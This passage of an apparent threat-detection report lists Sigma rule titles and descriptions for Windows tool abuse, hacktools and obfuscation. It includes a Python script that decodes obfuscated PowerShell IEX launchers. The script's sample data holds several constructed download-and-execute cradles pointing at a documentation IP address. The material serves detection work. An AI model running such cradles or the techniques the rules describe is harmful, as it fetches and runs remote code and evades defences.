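    for cmd in SAMPLE_COMMAND_LINES:
        hits = classify(cmd)
        print(f"{highest_level(hits) or '-':8} {cmd}")
        for title, level in hits:
            print(f"         {level:6} {title}")
```

The "uncommon target folder" row is deliberately not implemented: it needs a per-environment baseline of normal destinations rather than a static list, which is also why the Sigma rule scores it medium rather than high.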
Suspicious CodePage Switch Via CHCP | medium | Detects a code page switch in command line or batch scripts to a rare language
Process Access via TrolleyExpress Exclusion | high | Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
Potential Arbitrary File Download Via Cmdl32.EXE | medium | Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. Attackers can abuse this utility in order to download arbitrary files via a configuration file. Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
Curl Download And Execute Combination | high | Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
File Deletion Via Del | low | Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Greedy File Deletion Using Del | medium | Detects execution of the "del" builtin command to remove files using a greedy/wildcard expression. This is often used by malware to delete the content of folders that perhaps contain the initial malware infection, or to delete evidence.
NtdllPipe Like Activity Execution | high | Detects commands that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
Potentially Suspicious Ping/Copy Command Combination | medium | Detects an uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
Suspicious Ping/Del Command Combination | high | Detects a method often used by ransomware, which combines "ping" to wait a couple of seconds and then "del" to delete the file in question. It's used, for example, to hide the file responsible for the initial infection
Potentially Suspicious CMD Shell Output Redirect | medium | Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
Directory Removal Via Rmdir | low | Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces that indicate what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
CMSTP Execution Process Creation | high | Detects various indicators of Microsoft Connection Manager Profile Installer execution
Powershell Executed From Headless ConHost Process | medium | Detects the use of PowerShell commands from a headless ConHost window. The "--headless" flag hides the window from the user upon execution.
Suspicious High IntegrityLevel Conhost Legacy Option | informational | ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
Uncommon Child Process Of Conhost.EXE | medium | Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.
Control Panel Items | high | Detects the malicious use of a control panel item
CreateDump Process Dump | high | Detects uses of the createdump.exe LOLBIN utility to dump process memory
Dynamic .NET Compilation Via Csc.EXE | medium | Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
Csc.EXE Execution From Potentially Suspicious Parent | high | Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
Suspicious Csi.exe Usage | medium | Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter on the command line. Early versions of this utility provided with the Microsoft "Roslyn" Community Technology Preview were named 'rcsi.exe'
ManageEngine Endpoint Central Dctask64.EXE Potential Abuse | high | Detects the execution of "dctask64.exe", a binary signed by ZOHO Corporation and part of ManageEngine Endpoint Central. This binary can be abused for DLL injection and arbitrary command and process execution.
Uncommon Child Process Of Defaultpack.EXE | medium | Detects uncommon child processes of the "DefaultPack.EXE" binary used as a proxy to launch other programs
Potential DLL Sideloading Via DeviceEnroller.EXE | medium | Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
Potentially Suspicious Child Process Of ClickOnce Application | medium | Detects potentially suspicious child processes of a ClickOnce deployment application
Arbitrary MSI Download Via Devinit.EXE | medium | Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
Potentially Suspicious Child Process Of DiskShadow.EXE | medium | Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
Diskshadow Script Mode - Uncommon Script Extension Execution | medium | Detects execution of "Diskshadow.exe" in script mode to execute a script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.
Diskshadow Script Mode - Execution From Potential Suspicious Location | medium | Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.
Dism Remove Online Package | medium | Detects DISM (the Deployment Image Servicing and Management tool) removing a package from the online image. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Dllhost.EXE Execution Anomaly | high | Detects a "dllhost" process spawning with no command line arguments, which is very rare and could indicate process injection activity or malware mimicking similar system processes.
DLL Sideloading by VMware Xfer Utility | high | Detects execution of the VMware Xfer utility (VMwareXferlogs.exe) from a non-default directory, which may be an attempt to sideload an arbitrary DLL
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE | high | Detects the installation of a DNS plugin DLL via the ServerLevelPluginDll parameter in the registry, which can be used to execute code in the context of the DNS server (restart required)
Potential Application Whitelisting Bypass via Dnx.EXE | medium | Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. Attackers might abuse this in order to bypass application whitelisting.
Process Memory Dump Via Dotnet-Dump | medium | Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE | medium | Detects execution of arbitrary DLLs or unsigned code via ".csproj" files via Dotnet.EXE.
Binary Proxy Execution Via Dotnet-Trace.EXE | medium | Detects command line arguments for executing a child process via dotnet-trace.exe
Potentially Over Permissive Permissions Granted Using Dsacls.EXE | medium | Detects usage of Dsacls to grant over permissive permissions
Potential Password Spraying Attempt Using Dsacls.EXE | medium | Detects possible password spraying attempts using Dsacls
DumpMinitool Execution | medium | Detects the use of "DumpMinitool.exe", a tool that allows dumping process memory via "MiniDumpWriteDump"
Suspicious DumpMinitool Execution | high | Detects suspicious ways to use the "DumpMinitool.exe" binary
New Capture Session Launched Via DXCap.EXE | medium | Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or Windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
Potentially Suspicious Event Viewer Child Process | high | Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
Potentially Suspicious Cabinet File Expansion | medium | Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. as seen in Iranian MeteorExpress related attacks
Explorer Process Tree Break | medium | Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
Explorer NOUACCHECK Flag | high | Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag, which allows all sub processes of that newly started explorer.exe to run without any UAC checks
Remote File Download Via Findstr.EXE | medium | Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
Findstr Launching .lnk File | medium | Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
Insensitive Subfolder Search Via Findstr.EXE | low | Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
Filter Driver Unloaded Via Fltmc.EXE | medium | Detects filter driver unloading activity via fltmc.exe
Sysmon Driver Unloaded Via Fltmc.EXE | high | Detects the Sysmon filter driver possibly being unloaded via fltmc.exe
Forfiles.EXE Child Process Masquerading | high | Detects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
Uncommon FileSystem Load Attempt By Format.com | high | Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
Fsutil Suspicious Invocation | high | Detects suspicious parameters of fsutil (deleting the USN journal, configuring it with a small size, etc.). Might be used by ransomware during the attack (seen by NotPetya and others).
Potential Arbitrary Command Execution Via FTP.EXE | medium | Detects execution of an "ftp.exe" script with the "-s" or "/s" flag and any child processes run by "ftp.exe".
Potentially Suspicious GoogleUpdate Child Process | high | Detects potentially suspicious child processes of "GoogleUpdate.exe"
Suspicious GUP Usage | high | Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
HH.EXE Execution | low | Detects the execution of "hh.exe" to open ".chm" files.
Remote CHM File Download/Execution Via HH.EXE | high | Detects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.
HTML Help HH.EXE Suspicious Child Process | high | Detects a suspicious child process of Microsoft HTML Help (HH.exe)
Suspicious HH.EXE Execution | high | Detects a suspicious execution of Microsoft HTML Help (HH.exe)
HackTool - F-Secure C3 Load by Rundll32 | critical | F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
CobaltStrike Load by Rundll32 | high | Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line.
HackTool - CoercedPotato Execution | high | Detects the use of CoercedPotato, a tool for privilege escalation
HackTool - Covenant PowerShell Launcher | high | Detects suspicious command lines used in Covenant launchers
HackTool - CrackMapExec PowerShell Obfuscation | high | The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
HackTool - DInjector PowerShell Cradle Execution | critical | Detects the use of the DInjector PowerShell cradle based on the specific flags
HackTool - EDRSilencer Execution | high | Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server, based on PE metadata information.
HackTool - Empire PowerShell UAC Bypass | critical | Detects some Empire PowerShell UAC bypass methods
HackTool - GMER Rootkit Detector and Remover Execution | high | Detects the execution of the GMER tool based on image and hash fields.
HackTool - Impersonate Execution | medium | Detects execution of the Impersonate tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively
Invoke-Obfuscation COMPRESS OBFUSCATION | medium | Detects obfuscated PowerShell via COMPRESS OBFUSCATION
Invoke-Obfuscation CLIP+ Launcher | high | Detects obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX Invocation | high | Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the following code block
Invoke-Obfuscation STDIN+ Launcher | high | Detects obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher | high | Detects obfuscated use of environment variables to execute PowerShell
Invoke-Obfuscation Via Stdin | high | Detects obfuscated PowerShell via stdin in scripts
Invoke-Obfuscation Via Use Clip | high | Detects obfuscated PowerShell via use of Clip.exe in scripts
Invoke-Obfuscation Via Use MSHTA | high | Detects obfuscated PowerShell via use of MSHTA in scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION | high | Detects obfuscated PowerShell via VAR++ LAUNCHER
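The "Obfuscated IEX Invocation" row above covers constructions that never contain the literal string "iex" but rebuild it by indexing into variables whose values are predictable on a stock Windows install (for example `$env:ComSpec[4,15,25]` picks the letters i, e, x out of `C:\Windows\system32\cmd.exe`), while the CLIP+/STDIN+/VAR+ rows cover the launcher shells that wrap such a payload. The following is an added example for this report, not a Sigma rule: it resolves those index-and-concatenate chains against default variable values and reports whether they spell "iex", and it tags the three launcher shapes with simplified patterns. The default values, the launcher regexes and the sample command lines are this example's assumptions.

```python
"""Resolve Invoke-Obfuscation style index-sliced IEX constructions and flag the
CLIP+/STDIN+/VAR+ launcher shapes. Added example; default variable values,
launcher patterns and sample command lines are constructed assumptions."""
import re

# Values on a default 64-bit Windows / PowerShell 5.1 install (assumed for this example).
DEFAULT_VARS = {
    "env:comspec": r"C:\Windows\system32\cmd.exe",
    "env:public": r"C:\Users\Public",
    "pshome": r"C:\Windows\System32\WindowsPowerShell\v1.0",
    "shellid": "Microsoft.PowerShell",
    "verbosepreference": "SilentlyContinue",
}

# A term is either $Var[i,j,...] (optionally via .ToString()) or a short quoted literal.
TERM = re.compile(
    r"""\$((?:env:)?[a-z]+)(?:\.tostring\(\))?\[([\d,\s]+)\]|(['"])([^'"]{1,3})\3""", re.I)
PLUS = re.compile(r"\s*\+\s*")

LAUNCHERS = {  # simplified from the Invoke-Obfuscation launcher templates (assumption)
    "CLIP+": re.compile(r"\|\s*clip\b.*(?:get-clipboard|\.clipboard)", re.I | re.S),
    "STDIN+": re.compile(r"\|\s*powershell(?:\.exe)?\s[^|]*\s-\s*\"?\s*$", re.I),
    "VAR+": re.compile(r"\bset\s+\w+=.*&&.*powershell.*\$env:\w+", re.I | re.S),
}


def _resolve_term(m: re.Match) -> str:
    if m.group(1):                                   # variable index expression
        value = DEFAULT_VARS.get(m.group(1).lower())
        if value is None:
            return "?"                               # unknown variable: cannot resolve
        idx = [int(i) for i in re.split(r"[,\s]+", m.group(2).strip()) if i]
        return "".join(value[i] for i in idx if i < len(value))
    return m.group(4)                                # quoted literal


def resolve_chains(cmd: str) -> list[str]:
    """Resolve every '+'-joined run of terms in cmd to the string it builds."""
    chains, current, last_end = [], [], 0
    for m in TERM.finditer(cmd):
        if current and PLUS.fullmatch(cmd, last_end, m.start()):
            current.append(m)                        # continues the previous chain
        else:
            if current:
                chains.append("".join(_resolve_term(t) for t in current))
            current = [m]
        last_end = m.end()
    if current:
        chains.append("".join(_resolve_term(t) for t in current))
    return chains


def analyze(cmd: str) -> dict:
    """Report resolved chains, whether any spells IEX, and matching launcher shapes."""
    chains = resolve_chains(cmd)
    return {
        "resolved": chains,
        "hidden_iex": any(c.lower() == "iex" for c in chains),
        "launchers": [name for name, rx in LAUNCHERS.items() if rx.search(cmd)],
    }


SAMPLE_COMMAND_LINES = [  # constructed; 203.0.113.0/24 is a documentation range
    r"powershell -w hidden -c &($env:ComSpec[4,15,25])(New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')",
    r"powershell -nop -c &($ShellId[1]+$ShellId[13]+'x') (Get-Content C:\Users\Public\p.txt)",
    r"powershell -c .($PSHome[4]+$PSHome[30]+'x') $payload",
    r"powershell -c &($VerbosePreference.ToString()[1,3]+'x') $payload",
    r"powershell -c &($env:Public[13]+$env:Public[5]+'x') $payload",
    r'''cmd /c "echo (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a') | clip && powershell -w hidden -c Get-Clipboard|&($env:ComSpec[4,15,25])"''',
    r'''cmd /c "echo iex (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a') | powershell -noni -nop -w 1 -"''',
    r'''cmd /c "set c=&($env:ComSpec[4,15,25])(New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')&&powershell -w 1 -c $env:c|iex"''',
    r"powershell -c Get-Process | Where-Object {$_.CPU -gt 100}",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMAND_LINES:
        r = analyze(cmd)
        print(f"iex={r['hidden_iex']!s:5} launchers={r['launchers']} resolved={r['resolved']}")
```

Because the resolution depends on the variable values, the same expression can spell something else on a non-default install (a relocated `$PSHome`, for instance); the rule family in the table therefore matches the index syntax itself rather than the resolved string, and this resolver is best used for triage of the hits those rules produce.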
HackTool - LocalPotato Execution | high | Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples
HackTool - PowerTool Execution | high | Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files
HackTool - RedMimicry Winnti Playbook Execution | high | Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility
HackTool - PPID Spoofing SelectMyParent Tool Execution | high | Detects the use of parent process ID spoofing tools like Didier Stevens' tool SelectMyParent
HackTool - SharpEvtMute Execution | high | Detects the use of SharpEvtMute, a tool that tampers with the Windows event logs
HackTool - SharpImpersonation Execution | high | Detects execution of the SharpImpersonation tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively
HackTool - SharpDPAPI Execution | high | Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
HackTool - Stracciatella Execution | high | Detects Stracciatella, which executes a PowerShell runspace from within C# (aka the SharpPick technique) with AMSI, ETW and Script Block Logging disabled, based on PE metadata characteristics.
HackTool - UACMe Akagi Execution | high | Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata
HackTool - WinPwn Execution | high | Detects command line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
HackTool - Wmiexec Default Powershell Command | high | Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
HackTool - XORDump Execution | high | Detects suspicious use of the XORDump process memory dumping utility
Suspicious ZipExec Execution | medium | ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
Potential Fake Instance Of Hxtsr.EXE Executed | medium | HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of the Outlook apps and resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instance of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
Use Icacls to Hide File to Everyone | medium | Detects use of icacls to deny access for everyone in the Users folder, sometimes used to hide malicious files
Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location | high | Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. This behavior has been observed in-the-wild by different threat actors.
Disable Windows IIS HTTP Logging | high | Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
Suspicious IIS URL GlobalRules Rewrite Via AppCmd | medium | Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.
C# IL Code Compilation Via Ilasm.EXE | medium | Detects the use of "Ilasm.EXE" in order to compile C# intermediate language (IL) code to an EXE or DLL.
ImagingDevices Unusual Parent/Child Processes | high | Detects unusual parents or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity
Arbitrary File Download Via IMEWDBLD.EXE | high | Detects usage of "IMEWDBLD.exe" to download arbitrary files
InfDefaultInstall.exe .inf Execution | medium | Executes an SCT script using scrobj.dll from a command entered into a specially prepared INF file.
File Download Via InstallUtil.EXE | medium | Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
Suspicious Execution of InstallUtil Without Log | medium | Uses the .NET InstallUtil.exe application in order to execute an image without logging
JScript Compiler Execution | low | Detects the execution of "jsc.exe" (JScript Compiler). Attackers might abuse this in order to compile JScript files on the fly and bypass application whitelisting.
Kavremover Dropped Binary LOLBIN Usage | high | Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.
Windows Kernel Debugger Execution | medium | Detects execution of the Windows Kernel Debugger "kd.exe".
Potentially Suspicious Child Process of KeyScrambler.exe | medium | Detects potentially suspicious child processes of KeyScrambler.exe
Import LDAP Data Interchange Format File Via Ldifde.EXE | medium | Detects the execution of "Ldifde.exe" with the import flag "-i". This can be abused to include HTTP-based arguments which allow the arbitrary download of files from a remote server.
Uncommon Link.EXE Parent Process | medium | Detects an uncommon parent process of "LINK.EXE". Link.EXE is the Microsoft incremental linker, a utility usually bundled with a Visual Studio installation. Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc.) have a hardcoded call to the "LINK.EXE" binary without checking its validity. This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools is executed from a different location. By filtering the known locations of such utilities we can spot uncommon parent processes of LINK.EXE that might be suspicious or malicious.
Suspicious Windows Trace ETW Session Tamper Via Logman.EXE | high | Detects the execution of the "logman" utility in order to disable or delete Windows trace sessions
Suspicious CustomShellHost Execution | medium | Detects the execution of the CustomShellHost binary where the child process isn't 'C:\Windows\explorer.exe'
Devtoolslauncher.exe Executes Specified Binary | high | Detects Devtoolslauncher.exe executing another binary
DeviceCredentialDeployment Execution | medium | Detects the execution of DeviceCredentialDeployment to hide a process from view
Suspicious Diantz Alternate Data Stream Execution | medium | Compresses a target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
Suspicious Extrac32 Alternate Data Stream Execution | medium | Extracts data from a cab file and hides it in an alternate data stream
Gpscript Execution | medium | Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy
Ie4uinit Lolbin Use From Invalid Path | medium | Detects use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories
Launch-VsDevShell.PS1 Proxy Execution | medium | Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.
Potential Manage-bde.wsf Abuse To Proxy Execution | high | Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
Mavinject Inject DLL Into Running Process | high | Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
MpiExec Lolbin | high | Detects a certain command line flag combination used by the mpiexec.exe LOLBIN from HPC Pack that can be used to execute any other binary
Execute Files with Msdeploy.exe | medium | Detects file execution using the msdeploy.exe LOLBIN
Execute MSDT Via Answer File | high | Detects execution of "msdt.exe" using an answer file, which simulates the legitimate way of calling msdt via "pcwrun.exe" (for example from the compatibility tab)
OpenWith.exe Executes Specified Binary | high | Detects OpenWith.exe executing another binary
Indirect Command Execution By Program Compatibility Wizard | low | Detects indirect command execution via the Program Compatibility Assistant pcwrun.exe
Execute Pcwrun.EXE To Leverage Follina | high | Detects indirect command execution via the Program Compatibility Assistant "pcwrun.exe" leveraging the Follina (CVE-2022-30190) vulnerability
Code Execution via Pcwutl.dll | medium | Detects the launch of an executable by calling the LaunchApplication function from the pcwutl.dll library.
Execute Code with Pester.bat as Parent | medium | Detects code execution via Pester.bat (Pester - PowerShell module for testing)
Execute Code with Pester.batmediumDetects code execution via Pester.bat (Pester - Powershell Modulte for testing)
PrintBrm ZIP Creation of ExtractionhighDetects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
Pubprn.vbs Proxy ExecutionmediumDetects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
DLL Execution via Rasautou.exemediumDetects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
REGISTER_APP.VBS Proxy ExecutionmediumDetects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
Use of Remote.exemediumRemote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.
Lolbin Runexehelper Use As ProxymediumDetect usage of the "runexehelper.exe" binary as a proxy to launch other programs
Suspicious Runscripthelper.exemediumDetects execution of powershell scripts via Runscripthelper.exe
Use of Scriptrunner.exemediumThe "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
Using SettingSyncHost.exe as LOLBinhighDetects using SettingSyncHost.exe to run hijacked binary
Use Of The SFTP.EXE Binary As A LOLBINmediumDetects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag
SyncAppvPublishingServer Execute Arbitrary PowerShell CodemediumExecutes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
SyncAppvPublishingServer VBS Execute Arbitrary PowerShell CodemediumExecutes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
Potential DLL Injection Or Execution Using Tracker.exemediumDetects potential DLL injection and execution using "Tracker.exe"
Use of TTDInject.exemediumDetects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)
Time Travel Debugging Utility UsagehighDetects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
Lolbin Unregmp2.exe Use As ProxymediumDetect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"
UtilityFunctions.ps1 Proxy DllmediumDetects the use of a Microsoft signed script executing a managed DLL with PowerShell.
Use of VisualUiaVerifyNative.exemediumVisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.
Visual Basic Command Line Compiler UsagehighDetects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.
Use of VSIISExeLauncher.exemediumThe "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries
Use of Wfc.exemediumThe Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.
Potential Register_App.Vbs LOLScript AbusemediumDetects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution.
Potential Mftrace.EXE AbusemediumDetects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
CodePage Modification Via MODE.COM To Russian LanguagemediumDetects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware.
Potential Suspicious Mofcomp Execution | high | Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility, or with a suspicious path in the command line. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts.
Potential Mpclient.DLL Sideloading Via Defender Binaries | high | Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
File Download Via Windows Defender MpCmpRun.EXE | high | Detects the use of Windows Defender MpCmdRun.EXE to download files.
Suspicious Msbuild Execution By Uncommon Parent Process | medium | Detects suspicious execution of 'Msbuild.exe' by an uncommon parent process.
Windows Defender Definition Files Removed | high | Adversaries may disable security tools to avoid detection of their tools and activities by removing Windows Defender definition files.
Potential Arbitrary Command Execution Using Msdt.EXE | high | Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the Follina (CVE-2022-30190) vulnerability.
Suspicious Cabinet File Execution Via Msdt.EXE | medium | Detects execution of msdt.exe using the "cab" flag, which could indicate suspicious diagcab files with embedded answer files leveraging CVE-2022-30190.
Arbitrary File Download Via MSEDGE_PROXY.EXE | medium | Detects usage of "msedge_proxy.exe" to download arbitrary files.
Suspicious MSDT Parent Process | high | Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation.
Remotely Hosted HTA File Executed Via Mshta.EXE | high | Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious HTA file.
Suspicious JavaScript Execution Via Mshta.EXE | high | Detects execution of JavaScript code using "mshta.exe".
Potential LethalHTA Technique Execution | high | Detects the potential LethalHTA technique, where "mshta.exe" is spawned by an "svchost.exe" process.
Suspicious MSHTA Child Process | high | Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of malicious HTA script execution.
MSHTA Suspicious Execution 01 | high | Detection for mshta.exe suspicious execution patterns, sometimes involving file polyglotism.
DllUnregisterServer Function Call Via Msiexec.EXE | medium | Detects MsiExec loading a DLL and calling its DllUnregisterServer function.
Suspicious MsiExec Embedding Parent | medium | Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads.
Suspicious Msiexec Execute Arbitrary DLL | medium | Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).
Msiexec Quiet Installation | medium | Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).
Suspicious Msiexec Quiet Install From Remote Location | medium | Detects usage of Msiexec.exe to quietly install packages hosted remotely.
Potential MsiExec Masquerading | high | Detects the execution of msiexec.exe from an uncommon directory.
MsiExec Web Install | medium | Detects suspicious msiexec process starts with web addresses as parameters.
Arbitrary File Download Via MSOHTMED.EXE | medium | Detects usage of "MSOHTMED" to download arbitrary files.
Arbitrary File Download Via MSPUB.EXE | medium | Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files.
Potential Process Injection Via Msra.EXE | high | Detects potential process injection via Microsoft Remote Assistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics.
Detection of PowerShell Execution via Sqlps.exe | medium | This rule detects execution of PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
SQL Client Tools PowerShell Session Detection | medium | This rule detects execution of PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with Microsoft SQL Server Management Studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
Msxsl.EXE Execution | medium | Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.
Remote XSL Execution Via Msxsl.EXE | high | Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate potential remote execution of XSL files.
New Firewall Rule Added Via Netsh.EXE | medium | Detects the addition of a new rule to the Windows Firewall via netsh.
Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE | high | Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall.
RDP Connection Allowed Via Netsh.EXE | high | Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent malware.
